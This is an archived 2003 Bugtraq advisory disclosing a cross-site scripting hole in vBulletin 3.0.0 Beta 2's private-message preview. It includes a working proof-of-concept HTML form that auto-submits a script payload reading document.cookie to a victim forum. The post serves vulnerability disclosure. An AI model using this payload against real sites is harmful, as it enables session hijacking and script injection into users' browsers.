| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <004b01c319f8$c76cdc90$0b6aaec3@SS> Date: Wed, 14 May 2003 12:11:11 +0300 From: "Ferruh Mavituna" <ferruh@...ituna.com> To: <bugtraq@...urityfocus.com> Subject: VBulletin Preview Message - XSS Vuln ------------------------------------------------------ VBulletin Private Message "Preview Message" XSS Vulnerability ------------------------------------------------------ Any kind of XSS attacks possibility. ------------------------------------------------------ About VBulletin; ------------------------------------------------------ PHP Based Popular Forum Application Vendor & Demo; http://www.vbulletin.com/ ------------------------------------------------------ Vulnerable; ------------------------------------------------------ vBulletin 3.0.0 Beta 2 ------------------------------------------------------ Non Vulnerable; ------------------------------------------------------ vBulletin 2.2 ------------------------------------------------------ Vendor Status; ------------------------------------------------------ I can not contact vendor for this issue ! No patch available at the moment; ------------------------------------------------------ Solution; ------------------------------------------------------ HTML Encoding like post thread preview page; ------------------------------------------------------ Exploit Code; ------------------------------------------------------ <html> <body> <form action="http://[victim]/forum/private.php" method="post" name="vbform"> <input type="hidden" name="do" value="insertpm" /> <input type="hidden" name="pmid" value="" /> <input type="hidden" name="forward" value="" /> <input type="hidden" name="receipt" value="0" /> <input type="text" class="bginput" name="title" value="" size="40" tabindex="2" /> <textarea name="message" rows="20" cols="70" wrap="virtual" tabindex="3"></textarea> <input type="submit" class="button" name="sbutton" value="Post Message" accesskey="s" tabindex="4" /> <input type="submit" class="button" value="Preview Message" accesskey="p" name="preview" onclick="this.form.dopreview = true; return true;this.form.submit()" tabindex="5" > <input type="checkbox" name="savecopy" value="1" id="cb_savecopy" checked="checked" /> <input type="checkbox" name="signature" value="1" id="cb_signature" /> <input type="checkbox" name="parseurl" value="1" id="cb_parseurl" checked="checked" /> <input type="checkbox" name="disablesmilies" value="1" id="cb_disablesmilies" /> </form> <script> //Set Values and Submit // You can write your own JS codes var xss = "\"><script>alert(document.cookie)<\/script>"; document.vbform.title.value=xss; document.vbform.preview.click(); </script> </body> </html> *You may need login first Ferruh Mavituna Web Application Security Consultant Freelance Developer & Designer http://ferruh.mavituna.com ferruh@...ituna.com
Powered by blists - more mailing lists